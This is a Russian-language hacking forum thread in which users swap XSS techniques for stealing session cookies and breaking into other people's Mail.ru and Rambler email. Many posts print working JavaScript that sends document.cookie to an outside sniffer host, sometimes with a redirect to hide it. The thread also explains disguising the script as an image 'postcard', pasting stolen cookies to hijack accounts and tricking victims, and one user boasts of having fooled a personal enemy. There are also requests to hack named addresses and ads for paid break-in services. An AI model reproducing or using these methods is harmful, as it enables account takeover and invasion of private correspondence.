только если жертва нажимает открыть а не качает его сначала себе на комп

Цитата:

Сообщение от mavlyk

Привет всем народ помогите , как сделать откритку? а то так некто не будет вводить скрипты в строку!!!

вот тут все написано : [HIDE-REPLY]http://hacker-pro.net/showthread.php?t=7288&highlight=%F1%ED%E8%F4%E5%F0[/HIDE-REPLY]

Привет всем народ помогите , как сделать откритку? а то так некто не будет вводить скрипты в строку!!!

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

открывается везде в опере тем более...осталось дело за малым вбей куки и обнови страницу.

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

Цитата:

Сообщение от noxcho

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

программой не найдеш =) особенно на майл ру)

ручками можеш поимкать с помощью этого скрипта
">alert()
вставляеш его после первого знака = в адресной строке.
И еще в строчки где есть запрос на отправку

сори за глупость ! нокак это сделать ???

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Цитата:

Сообщение от kamikadze1988

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

незнаю попробуй поменять ссылку на картинку.. (картинку вставь другую):turned:

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

вообщем такая хрень у меня
делаю всё как сдесь.. куки приходят, всё норм
но когда сую куки в оперу, почта не открывается
что делать ?

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

с пассивкой можно сделать редирект на открытку:wink: чел смотрит фотку ты смотришь его почту:turned:

Цитата:

Сообщение от PioNeeRkin

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

куки на сниффере! в разделе "лог"

Добавлено через 10 минут

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет

Не знаю, у меня на майле все отлично работает =)

Всем привет.
Я тут новенький.
и хотел узнать свои ошибки.
1. вот JavaScript код с редиректом

img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://de.fishki.net/picsw/012010/20/post/devushki/tn.jpg"
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

куки вообще не приходят, прихотит ip и info о браузере.

2. делал просто JavaScript код

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie;')

куки приходят но когда я заменяю свои то не попадаю на почту.

кто подскажет как на mail попасть ?

3. я смогу посмореть почту после манипуляции с куки только когда жертва онлайн?
или в любой момент и даже через день или 2 ?

смотри все ли правильно сделал! поидеи должны приходить! только если жертва не сохраняла сначала на комп а потом заходила.. тогда прийдет только ип. и через день и через 2 ты уже не зайдешь! они изменяются!

Цитата:

Сообщение от INC

смотри все ли правильно сделал! поидеи должны приходить! только если жертва не сохраняла сначала на комп а потом заходила.. тогда прийдет только ип. и через день и через 2 ты уже не зайдешь! они изменяются!

когда жертва смотрит письмо и нажимает на файл и открыть с помощью ie и оно открывается, а кук нет.
вот вопрос в том что если у жертвы стоит nero, то файл.img открывается через неро по умолчанию. как делать так что бы полюбому открывался через браузер?

прикольно

Всем добрый день !
У меня один вопросик: я могу получать куки но в куках отображается сессия , можно что то сделать чтобы там отображался , пусть зашифрованный но пароль от акк майл ру

зарание спасибо

куки выглядят след образом :

mrcu=A1E24B4ABDD938865BA027416C4D; p=Z/EBAOJ/OAAA; searchuid=1826692951238656552; VID=2qzEA407NSmj; c56=0LRcSwAAAALaHQIAAAAAAzK9AgAAAAADqPABAAAAAANjrw MAAAAAA7LOAgAAAAADsDkBAAAAAAO1IAMAAAAA; c8=0BFaSwAAAAL1xAEAAAAAAn5lAQAAAAAA0BICAAAAAAMhDwM AAAAAApZcAQAAAAADdxkBAAAAAANMJgEAAAAAAmAiAgAAAAACo XkBAAAAAAIw wIAAAAAArNKAgAAAAADAW0CAAAAAAO3lQEAAAAAA14vAQAAAAA C0WQBAAAAAAFj3QEAAAAAAflSAQAAAAADtgkBAAAAAAMTWAEAA AAAAh/cAQAAAAACAeQCAAAAAAKWWwIAAAAAA6FzBAAAAAADqqADAAAAA AJeYwEAAAAAAoLYAQAAAAACllkBAAAAAAMTYAEAAAAAApF6AQA AAAADsFMBAAAAAAO2ywEAAAAAA7BhAQAAAAADsGABAAAA; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAACAAABAAAAAAAAAAAdAB0JwAcA; Mpop=1264147452:7e0263650a416842190502190a1d00071c 0504054966535c465d0505070a1e0a05051e5b5c5944444805 0507065f5d5c58105c5f4b461c4a4c:exempl@list.ru:; c0=UHMrTQAAAANwAgEAAAAA; __utma=102067678.901330808.1263813350.1263820881.1 264078632.3; __utmz=102067678.1263813350.1.1.utmcsr=(direct)|ut mccn=(direct)|utmcmd=(none); Mpopl=1342738696

Цитата:

Сообщение от dimyan-007

Всё это интересно и всегда идет по одному методу, клюнет или нет, а если жертва умнее чем мы думаем, не открывает подозрительных писем. не нажимает на всякие ссылки, и тем более не сохраняет пароль в своем компе. тогда как можно в этом случае взломать её почту,

тогда нужно путем обмана,подробно узнать о жертве данные,
включая и ип адрес и отослать в службу поддержки,
если всё совпадет они вышлют новый пароль от ящика на указанный твой емаел...

...

мля... народ, взломайте плиз мыло nexx@mail.ru
очень хочу се это мыло!))) там всё равно похоже несколько лет никого не было... мир не создан и всё такое.... помогите плизЗ!
отпишитесь потом мне на мыло nexx0711@mail.ru

protest у меня кстати тоже самое! но тут никто толком не ответит так как мне кажется они и сами не знают только понты наводят!!! да и еще когда попытался найти того кто подскажет меня админ забанил на 2 месяца!!!так что ты по аккуратнее))))))))))

Вот написал такой скриптик, так как куки не приходят, если .img файл открывать локально потому что нет рефера с mail.ru. Теперь вопрос, как человека сначала перевести на mail.ru, а потом уже на снифер, только без флуда пожалуйся.... кто понимает, подкорректируйте плз...можно и в личку...

Test

function Sniffer () {
img = new Image(); img.src = "http://httpz.ru/nuj1gb38u27.gif?"+document.cookie;
}

Цитата:

Сообщение от zzzz_sasha_zzzz

protest у меня кстати тоже самое! но тут никто толком не ответит так как мне кажется они и сами не знают только понты наводят!!! да и еще когда попытался найти того кто подскажет меня админ забанил на 2 месяца!!!так что ты по аккуратнее))))))))))

кароче я всё понял это всё сказки и только.
тут все такие как и я IT-шники и всё такое. Всё пытаются и пытаются.
а если реально надо вскрыть ящик то надо обратится к googlu и за бабло сделать.
я давал объяву в разделе услуги, кто взломает таму деньги. тут понислась предоплата какая то развод разный и всё такое.
мой совет каму надо вскрыть ищите в нете за 1000 или 1200 р.
я вот обратился в одну кантору, теперь жду результатов.
если помогут дам их контакты на сайт.
еще скажу что бы узнать пароль с помощью востановления пароля, отвечать на вопросы. я писал всю инфу кроме ответо на сикретный вопрос и мне пароль не прислали, сказали мало инфы.
а я знаю всё о жертве и данные были введены все правельные.
всем удачи по взлому.

Обращайтесь. Качественно (пароль не меняется), конфиденциально.
Лично сам пользовался и не один раз.
Не дешево (ИМХО), но когда нужно, то хорошо знать верный вариант.

http://397998811.ru (https://hpc.name/redirector.html#http://397998811.ru)

Здравствуйте! Помогите пожалуйста. Перечитала полностью Особенности взлома почты на Mail.ru у вас на сайте, с куками проблем нет. Куки пришли, поменяла я их в опере тоже без проблем, каспера обошла, захожу на сайт mail.ru пишется логин жертвы и пароль (под звездочками) но когда нажимаю кнопку «Войти» просит ввести пароль. Уже неделю мучаюсь, застряла на этом и ничего не могу сделать. Помогите пожалуйста. За ранние спасибо.:2_2_2:

объясните
Так тут и не ответили на вопрос , куки не приходят не фига

img = new Image(); img.src = "http://httpz.ru/*******.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/*******.jpg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

/*******.gif?"+document.cookie; // здесь ваш код для кражи кукис

какой код ставить надо и где его брать ?

Цитата:

Сообщение от DancerRino

скиньте плз сайт где моно закачать сниффер

всмысле для загрузки собственного ?

пробовал на свое прописать майле куки
но если сделать выход из акка то куки не проходят
нужно вводить пароль заново
почему так
может что то я делаю не так ?

Цитата:

Сообщение от opalamer

Здравствуйте! Помогите пожалуйста. Перечитала полностью Особенности взлома почты на Mail.ru у вас на сайте, с куками проблем нет. Куки пришли, поменяла я их в опере тоже без проблем, каспера обошла, захожу на сайт mail.ru пишется логин жертвы и пароль (под звездочками) но когда нажимаю кнопку «Войти» просит ввести пароль. Уже неделю мучаюсь, застряла на этом и ничего не могу сделать. Помогите пожалуйста. За ранние спасибо.:2_2_2:

во-первых куки нужны свежие. а во-вторых зачем нажимать "войти"?? просто предварительно зайди со своего аккаунта, зайди на страницу просмотра входящих сообщений, подменяй куки и обновляй страницу, если все правильно окажешься в ящике жертвы.

нет !
я так пробовал
видимо это прикрыли уже
захожу в свой акк меня куки
нажимаю на входящие меня перебрасывает на введение пароля
в чем дело
что не так ?

Цитата:

Сообщение от morgan-id

нет !
я так пробовал
видимо это прикрыли уже
захожу в свой акк меня куки
нажимаю на входящие меня перебрасывает на введение пароля
в чем дело
что не так ?

Раньше ты так делал??? у тебя так получалось?

раньше я так не делал
но сейчас я так попробовал на своем ящике
и если войти в в свой ящик
и при этом поменять куки на другой ящик и предварительно на том ящике закончить сессию
то куки не помогаю
при нажатии входящие перебрасывает на тот ящик который закрыл сессию и просит ввести пароль

Добавлено через 1 минуту
видимо дыра уже закрыта в майле
или вчем то в другом дело
я не понимаю

Цитата:

Сообщение от morgan-id

раньше я так не делал
но сейчас я так попробовал на своем ящике
и если войти в в свой ящик
и при этом поменять куки на другой ящик и предварительно на том ящике закончить сессию
то куки не помогаю
при нажатии входящие перебрасывает на тот ящик который закрыл сессию и просит ввести пароль

Добавлено через 1 минуту
видимо дыра уже закрыта в майле
или вчем то в другом дело
я не понимаю

Куки имеют время жизни. Как только ты нажал выход, тем самым закончил ссесию они перестали быть действительными...

Цитата:

Сообщение от xakerenok

Куки имеют время жизни. Как только ты нажал выход, тем самым закончил ссесию они перестали быть действительными...

так вот я и говорю что это бесмысленно куки красть
все равно потом повторно не зайти в ящик так как жертва просто напросто выйдет из ящика

а вот если бы бы была возможность узнать пароль с помощью этих куков
то это было бы здорово !

что куда вставлять?

всем привет!
вот сделал как говориться, у меня получилось:

img = new Image(); img.src = "http://httpz.ru/ngd9io1nmts.gif?"+document.cookie;

я сделал из этого картинку и отправил сам себе (с другого мыла)
када я нажимаю на картинку мне пишет:
"Изображение « не может быть показано, так как содержит ошибки."

что можно сделать?спасибо!

img = new Image(); img.src = "http://httpz.ru/ngd9io1nmts.gif?"+document.cookie;

я сделал из этого картинку и отправил сам себе (с другого мыла)

Вставил скрипт в блокнот и сохранил с расширением *.img

Цитата:

Сообщение от opalamer

img = new Image(); img.src = "http://httpz.ru/ngd9io1nmts.gif?"+document.cookie;

я сделал из этого картинку и отправил сам себе (с другого мыла)

Вставил скрипт в блокнот и сохранил с расширением *.img

оуууууу спасибо))))))))))щас поппробую!
----------------------------------------------------------------------------------
попробовал....
изменил разширение на *.img и отправил, пришло письмо в низу написано:
"Прикрепленные данные: lol.img (application/octet-stream, 1K)
Скачать Удалить"
я скачал но в сниффере ничего не добавилось....что делать?
Спасибо)))
и ещё...у меня комп определил это как файл образа и пытался сохранить, но я открыл его через ФФ и в сниффер пришли данные но куков там не было...

:2_2_2:С праздником, дорогие мужчины!!!!:2_2_2: Забудьте сегодня о взломах и давайте выпьем за Вас!

Спасибо! Наоборот ломать надо сегодня, пока все пьяные и доверчивые!

:thumbsup:

Цитата:

Сообщение от 6o6er

оуууууу спасибо))))))))))щас поппробую!
----------------------------------------------------------------------------------
попробовал....
изменил разширение на *.img и отправил, пришло письмо в низу написано:
"Прикрепленные данные: lol.img (application/octet-stream, 1K)
Скачать Удалить"
я скачал но в сниффере ничего не добавилось....что делать?
Спасибо)))
и ещё...у меня комп определил это как файл образа и пытался сохранить, но я открыл его через ФФ и в сниффер пришли данные но куков там не было...

ты все правильно сделал но :

1 нужно не сохранить а попросить жертву открыть !
2 чтоб он открыл файл прям из почты !

только в етом случае тебе прийдут куки с его почты!

да и на счет времени действия куков на маил около 40 мин а на других гдето от 10 до 20

Че за контент?

Да всё просто объяснили спс.

Цитата:

Сообщение от Ram0nlord

этот инмтрумент находится тут http://hpc.name/sniffer/
А ваще у мужиков всегда с собой инструмент быть должен ес чо...

Сегодня там поковырялся и почта моя ушла =(:help:

Цитата:

Сообщение от Baksik

Сегодня там поковырялся и почта моя ушла =(:help:

ясное дело) ты на хакерском сайте, так что надо быть готовым к такому=)

Подскажите плиз, мучаюсь третий день уж. Я делаю рисунок в формате jpg со следующим содержанием:
1-й вариант

img = new Image(); img.src = "http://httpz.ru/nfouazoqgt6.gif?"+document.cookie; // здесь ваш код для кражи кукис

// редирект через 3 сек.

var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой

var speed = 3000; // редирект через 3 секунды

function reload() {

document.location = URL

}

setTimeout("reload()", speed);



2-й вариант javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nfouazoqgt6.gif?"+document.cookie;')

3-й вариант

img = new Image(); img.src = "http://httpz.ru/ngd9io1nmts.gif?"+document.cookie;


и много подобных вариантов а картинка блин определяется как неверный формат.открывал сразу с оперы.. в чем проблема может быть врое всё правильно делаю.

PS. Куки неприходят

Цитата:

Сообщение от vik3001

Подскажите плиз, мучаюсь третий день уж. Я делаю рисунок в формате jpg со следующим содержанием:
1-й вариант

img = new Image(); img.src = "http://httpz.ru/nfouazoqgt6.gif?"+document.cookie; // здесь ваш код для кражи кукис

// редирект через 3 сек.

var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой

var speed = 3000; // редирект через 3 секунды

function reload() {

document.location = URL

}

setTimeout("reload()", speed);



2-й вариант javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nfouazoqgt6.gif?"+document.cookie;')

3-й вариант

img = new Image(); img.src = "http://httpz.ru/ngd9io1nmts.gif?"+document.cookie;


и много подобных вариантов а картинка блин определяется как неверный формат.открывал сразу с оперы.. в чем проблема может быть врое всё правильно делаю.

PS. Куки неприходят

брателло,ты все правильно делаешь,но на mail.ru это уже не прокатывает!:angry1: а на rambler-прокатывает,на днях проверил на себе.

Только что попробовал на рамблере, нифига.
Вот на чём остановился: создал файл ФОТО.img
в середине

img = new Image(); img.src = "http://httpz.ru/nfouazoqgt6.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://i2.fastpic.ru/big/2010/0322/5a/a530294bddcbd96e6bbb3410c84ab45a.jpeg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

открываю фал в мозиле, адрес и ккуки не приходит, просто инфа с какого браузера открыли.:hmcool:

Дык для этого метода еще и пассивка нужна.

да,проверил.уже и на рамблере не катит.недавно закрыли..без пассивки далеко не пойдеш,но и пассивки быстро закрывают

реально ли взломать сейчас майл.ру?

в чём проблемы? Пробовал через разные пасивки для мейла,отправляя письмо,
а ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.
Возможно, оно отображается неправильно.
как можно это обойти

Цитата:

Сообщение от sar92

в чём проблемы? Пробовал через разные пасивки для мейла,отправляя письмо,
а ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.
Возможно, оно отображается неправильно.
как можно это обойти

Сохраняй не в html формате , а в htm :glass:

И причем здесь пасивка...Пасивка это одно дело,открытка это другое...

sar92 Этот способ с открыткой который ты хочеш использывать уже прикрыли,и он не работает...Ищи другие варианты...)))

+,прикрипленый фаел открывается не в этом окне,а в новым тем самым не угоняет куки,как можно исправить эту проблему

посоветуйте хороший сниффер

http://hpc.name/sniffer/

Цитата:

Сообщение от Badak

Сначала тут найди нужную пассивку http://hpc.name/showthread.php?t=2865%DD

Я нашел пассивку,а что потом,куда ее вставлять?

Скачай видео по сниферу, вопросов будет меньше

Добавлено через 57 минут
Люди добрые объясните как искать пассивные XSS на майле, понял что вставлять ">alert(), а по подробнее ??? и как узнать что наконец нашел пассивную XSS? В этой теме внятного ответа на этот вопрос я еще не видел

Сегодня долго ломал голову почему отправляемые письма c ссылкой на фейк (фейк на хостинге webservis.ru) mail.ru фильтровал как спам.....оказалось всё дело в хостинге ****.vipcentr.ru походу у них в черном списке. письмо с другим хостингом проходиn на ура.. а буквально вчера всё было нормально......

эмм а можно из куков выдрать пароль?

можно и пароль выдрать , главное знать как.

не везде в кукисах хранится пароль!

а как потом ко мне вернеться айп жертвы??

Цитата:

Сообщение от anisjon3000

а как потом ко мне вернеться айп жертвы??

я чтото не пойму причем тут ip ?
может ты тему перепутал ?
но все же я попытаюсь ответить на вопрос :turned:

вот тут все описано как создать и настроить под себя трой который на почту отсылает ip и пароли из оперы и мозилы http://hpc.name/showthread.php?t=12626:hmcool:
--------------------------------
помог ставь + и спс

В почте скрипт не открывается... он предлагает скачать его, ну а в самом компе он естественно не открывается как картинка... Помогите! что делать?

Ничего уже не делать. Прикрыли эту багу. Давно. Всё.

один фиг куки не приходят и все ток рефер и ип

Помогите......Понять....

Вот ссобственно проблема

Заставил я жертву ввести в адресную строку вот ето:

Цитата:


javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nm7rl7jic1x.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);')



Мне в снифер пришло вот ето :

Цитата:


p=Q6gIANpvKgAA; searchuid=1737750271263032593; posts_subscriptions=alkorrr@mail.ru,62178318:0,216 526937:0; VID=3Z5Sxx3x7Aml; __utmz=56108983.1205099456.2.2.utmcsr=win.mail.ru| utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/sentmsg; __utma=56108983.957395479.1205078247.1205078247.12 05099456.2; Mpopl=101312032; Mpop=1274885017:57616a635c65005f190502190f1d00071c 0507004966535c465d0508060b0516010e051658545a5f4345 471658505d5b174345:alkorrr@mail.ru:; mrcu=8C674B508E9519FAC4531116030A; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAABAAABAAAAAAAAAACAAAICvwcA; b=ojkHCCA1oQEAjB8RtkkcYLoJyBwNXsEIOOwM3/sQRoMMmp0LAzpOggMAIJQ4e4TTj49wAvIRAAAA; waSes=1



Как вообше ето розшывровать???

или может я чонить не правильно делаю или етот способ уже сейчас не актуален???

Цитата:

Сообщение от alkorrr

Помогите......Понять....

Вот ссобственно проблема

Заставил я жертву ввести в адресную строку вот ето:

Мне в снифер пришло вот ето :

Как вообше ето розшывровать???

или может я чонить не правильно делаю или етот способ уже сейчас не актуален???

Ето имено то что надо для взлома терь качай оперу жми инструменты---> дополнительно---->Управление ciikies
Там ищи mail.ru и точто ты украл заменяй там

Добавлено через 7 минут
Давно ты их украл куки они скорей всего уже устарели

Вопрос ето ты себе вставил? так как твой ник alkorrr а в куках (жертвы) по твоих словал емейл alkorrr@mail.ru

нет просто етот ник позаимствовал у моего (Врага)чей мыльник был использован

Добавлено через 3 минуты
отправил с анонимного мыла ему такое:

Цитата:


Введи ето:Сам скрипт

И получиш новые возможности на своей почте....



И он клюнул!!!

Я не поняла как использовать JavaScript код с редиректом. Его надо разместить на странице, на которую жертва попадает по ссылке в письме? И чтобы страница открылась в том же окне? Или не так я поняла. У меня не приходят куки когда я так делаю. Когда размещаю аналогично iframe на странице, то куки приходят. Но дело в том что мне нужен редирект чтобы происходил обратно в папку со входящими письмами. То есть что бы на несколько секунд появлялась пустая страница и жертва возвращалась в свой ящик. :help:

Если ты хочеш чтоб был редирект например жертва нажала на сайт ты украла у него куки и она вернулась обратно к списку сообщений если да то введи етот код у себя настранице
code:


var URL = "http://ссылка к письмам"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);


и радуйся=) и не забывай про +

Как сделать гиперссылку в майл ру агенте и/или в л.с в мире?

Цитата:


ВНИМАНИЕ!
Напоминаем, что администрация Mail.Ru и владельцы других сайтов никогда не просят своих пользователей прислать им пароли от ящиков.
Будьте внимательны, не попадайтесь на уловки мошенников!



В чем проблема нашёл... реагирует на строку Подскажите как можно зашифровать слово "password".

Заранее спасибо.

пока в тестовом режиме отправляю открытку и делаю все в точности как описанно... но куки так и не приходят.. что за подстава... через браузерную ссылку ве впорядке

Цитата:

Сообщение от Securay

Как сделать гиперссылку в майл ру агенте и/или в л.с в мире?

ссылки только в агенте можно, просто втсавляешь она и будет гиперссылкой

чуть ли не каждый день на маил ру какие та обновления,
взломать открыткой или брутом уже не реально......
фейк такая же ерунда.всякие предупреждения вылазиют......
маил.ру становится одним из безопасных проектов

Цитата:


ссылки только в агенте можно, просто втсавляешь она и будет гиперссылкой



можно поподробней? ты не чё не путаешь?... ты понимаешь разницу между обычной ссылкой и гиперссылкой?

Да,сегодня решил жертве пороль сменить,а на тебе сюрприз. Теперь в Мейле,что бы сменить пароль,на ды вести старый)))
:asian: Всё становится трудней и трудней!!!

Ivan507, ну во-первых, этот способ не работает уже больше года!
А во-вторых, ты и так не правильно делаешь... картинка должна быть не какая ни попадя, а со сниффа. Но поять же повторяюсь, что это всё равно не робит))

Люди добрые! Объясните еще раз, ко мне куки не приходят:(.

Вот я пытался делать:
1)открыл блокнот и вписал: alert('XSS') затем сохранил в формат jpeg, под названием 1.jpeg.
2) открыл блокнот и вписал:
img = new Image(); img.src = "http://word-soft.ucoz.ru/Cokies/1.jpeg?"+document.cookie;
. Сохранил 2.jepeg

http://word-soft.ucoz.ru (https://hpc.name/redirector.html#http://word-soft.ucoz.ru) – это мой сайт.

Все, вот ссылки фоток:
http://word-soft.ucoz.ru/Cokies/2.jpeg (https://hpc.name/redirector.html#http://word-soft.ucoz.ru/Cokies/2.jpeg)
http://word-soft.ucoz.ru/Cokies/1.jpeg (https://hpc.name/redirector.html#http://word-soft.ucoz.ru/Cokies/1.jpeg)

Я их копирую в браузер и результат 0.
Да, я не до конца понял, куда приходят куки, если ссылка внесена в браузер не вкл. почту?
Я подумал на сайт, но это бред:(.

Плиз помогите!!! :rolleyes:

"JavaScript код для адресной строки с редиректом"...у меня всё сработало...:shifty))большое спс сайту...а то ваще нихрины не врубался)))

Цитата:

Сообщение от Michell

кто мне популярно объяснить как на сегодняшний день взломать почтовый ящик на мэйл ру?

Фейк, Троян, Социальная Инженерия(СИ). На форуме или в google найдёшь подробности.

Цитата:

Сообщение от Michell

ну конкретно что можно скачать?? я уже весь инет облазила скачала много чего и все архивы запаролены! может кто даст ссылочку...очень нужно хакнуть мыло..

https://hpc.name/text/index.php?mid=667

https://hpc.name/showthread.php?t=12907

Цитата:


чуть ли не каждый день на маил ру какие та обновления,
взломать открыткой или брутом уже не реально......
фейк такая же ерунда.всякие предупреждения вылазиют......
маил.ру становится одним из безопасных проектов



Я обошел все что можно...

[/URL][URL="https://hpc.name/redirector.html#http://radikal.ru/F/s005.radikal.ru/i211/1006/dc/36ff965691f2.png.html"] (https://hpc.name/redirector.html#http://radikal.ru/F/s005.radikal.ru/i211/1006/dc/36ff965691f2.png.html)IMAGE (https://hpc.name/redirector.html#http://s005.radikal.ru/i211/1006/dc/36ff965691f2t.jpg) http://s005.radikal.ru/i211/1006/dc/36ff965691f2t.jpg

Цитата:

Сообщение от meloman

Я обошел все что можно...

[/URL][URL="https://hpc.name/redirector.html#http://radikal.ru/F/s005.radikal.ru/i211/1006/dc/36ff965691f2.png.html"] (https://hpc.name/redirector.html#http://radikal.ru/F/s005.radikal.ru/i211/1006/dc/36ff965691f2.png.html)IMAGE (https://hpc.name/redirector.html#http://s005.radikal.ru/i211/1006/dc/36ff965691f2t.jpg) http://s005.radikal.ru/i211/1006/dc/36ff965691f2t.jpg

код формы можешь дать?

Цитата:

Сообщение от dosha911

код формы можешь дать?

Он есть на форуме поищи.. да дело даже не в этом коде... фишка в другом!...

статья отличная!!! всё понял, но теперь не могу найти пассивку на mail.ru, у кого есть, пожалуйста киньте в личку

Цитата:

Сообщение от Yuli44ka_solnce

Ребят!!!!!! У меня к вам вопрос!!!!!!!!!!!!!! Произошла такая ситуация.Я болтала в агенте на mail'е с одним человеком. В это время один товарищ из друзей пишет мне то же самое что и первый. Я сначала не обратила внимания. Но потом подруга прислала фото своего друга, на что этот товарищ бросает такую фразу "Хорош". Тут я задумалась... Похоже этот парень читал всё что мне приходило в агент и всё что я отправляла. Это вообще возможно? Или это реально невероятнейшее совпадение???? Хотелось бы прояснить ситуацию...

Может у тебя на компе стоит кейлогер или просто у этого чела есть твой пароль с помощью которого он залазет на твою почту и смотрит там архив майла

Кейлоггер вряд-ли, тут скорее радмин или тим-вьюер

Ребят!!!!!! У меня к вам вопрос!!!!!!!!!!!!!! Произошла такая ситуация.Я болтала в агенте на mail'е с одним человеком. В это время один товарищ из друзей пишет мне то же самое что и первый. Я сначала не обратила внимания. Но потом подруга прислала фото своего друга, на что этот товарищ бросает такую фразу "Хорош". Тут я задумалась... Похоже этот парень читал всё что мне приходило в агент и всё что я отправляла. Это вообще возможно? Или это реально невероятнейшее совпадение???? Хотелось бы прояснить ситуацию...

Цитата:

Сообщение от M@ZAX@KEP

Кейлоггер вряд-ли, тут скорее радмин или тим-вьюер

А как узнать точнее? Я в этих делах ничего не смыслю=(( И что это вобще такое? Кейлоггер, радмин, тим-вьюер??? вы уж простите за тупость(:i41:

Цитата:

Сообщение от Yuli44ka_solnce

А как узнать точнее? Я в этих делах ничего не смыслю=(( И что это вобще такое? Кейлоггер, радмин, тим-вьюер??? вы уж простите за тупость(:i41:

А ты в гугле набери эти названия будет тебе инфы за всю жизнь не прочитаеш):wink:

можно это изображение заюзать в чате) [имг]ссыль[/имг]
тогда никому не надо будет ничего открывать)

а я узнаю если мою почту уже взломали?

Цитата:

Сообщение от donik83

а я узнаю если мою почту уже взломали?

нет не узнаешь....если только пароль сменят....или как нибудь еще спалятся

Цитата:

Сообщение от vonkolot

нет не узнаешь....если только пароль сменят....или как нибудь еще спалятся

ну почему же , можно поставить в настройках безопасности

"Показывать информацию о последнем входе в систему" позволит вам узнать, когда и с какого IP-адреса происходило последнее обращение к вашему почтовому ящику. Данные по входам через веб-интерфейс (HTTP) обновляются в режиме on-line (т.е. во время каждого следующего входа Вы увидите дату, время и IP-адрес предыдущего входа). Данные по входам через почтовые программы (РОР3) обновляются один раз в сутки (т.е. во время каждого входа Вы увидите дату, время и IP-адрес последнего входа за предыдущие сутки).

кто нить пробовал маскировать ссылки? у меня их браузер блокирует! Есть варианты какие? А то ссылка на сниффер уж больно выделяется в строке состояний!

Вот скрипт для почты
http://slil.ru/29523099 (https://hpc.name/redirector.html#http://slil.ru/29523099)

Ребят, помогите пожалусто у меня такая фигня:
Я хотел взломать одну почту на mail.ru, стирил куки! пример:

__utmz=.......
__utma=........
Mpop=.......
mrcu=........
t=......
b=.........
Mpopl=.......
VID=......

которую с етих значений нужно поставить себе?

Цитата:

Сообщение от edaras

Ребят, помогите пожалусто у меня такая фигня:
Я хотел взломать одну почту на mail.ru, стирил куки! пример:

__utmz=.......
__utma=........
Mpop=.......
mrcu=........
t=......
b=.........
Mpopl=.......
VID=......

которую с етих значений нужно поставить себе?

Mpop=.......

А можно сделать тоже самое, но только при открытии письма, чтобы сразу своровал?

edaras, подставляй все, не ошибёшься.

Есть классный фейк для лома ВК дам и помогу разобраться! Насчет этой темы пишите в асю: 625977518

Чтобы что сразу своровал? Кукисы или лоин и пароль?
1 невозможно, потому что это не xss
2 невозможно, потому что пароль хранится в базе на сервере и пользователь не имеет к нему никакого доступа. Он не может его сам прочесть никак и ни откуда, может только сам ввести.

вроде снифера везде уже прикрыли как я слышал? или это не так?

да...снифером не получается больше...он не видает куки...

Цитата:

Сообщение от Zext

вроде снифера везде уже прикрыли как я слышал? или это не так?

Свой создай. Вот к примеру: https://hpc.name/showthread.php?p=175836#post175836

Цитата:

Сообщение от sprin3er1

Свой создай. Вот к примеру: https://hpc.name/showthread.php?p=175836#post175836

не пахает ссылочка :hmm1:

можно и этот испольовать https://hpc.name/sniffer/

не совсем понятно почему создав с расширением img - файл выполнится ?...
это же графическое расширение...соответственн� � -выдаст ошибку..... ну так ! ??????????????

Добавлено через 15 минут
..проще видео выложить , о том как и что ....этот способ будет самый познавательный......
видео в студию....
кто сможет ?

... да не правда .не выполниться сценарий..., выдаст ошибку...

сценарий выполняется, только вот уже давно майл все такие штучки типа <> и т.д не кушает он просто их меняет на код %**** и т.д

